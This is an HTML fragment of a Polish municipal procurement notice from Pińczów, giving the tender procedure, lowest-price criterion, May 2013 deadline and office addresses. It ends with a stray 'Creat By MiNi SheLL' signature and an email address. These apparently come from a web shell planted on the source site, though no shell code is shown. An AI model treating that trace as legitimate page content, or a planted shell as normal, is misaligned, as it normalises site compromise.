<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pinczow.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Pińczowie, ul. 3 Maja 10, pokój 36.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2013 godzina 10:30, miejsce: Ofertę należy złożyć w kancelarii Urzędu Miejskiego w Pińczowie, ul. 3 Maja 10, pokój 29, w terminie do 28.05.2013 r., do godz. 10.30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com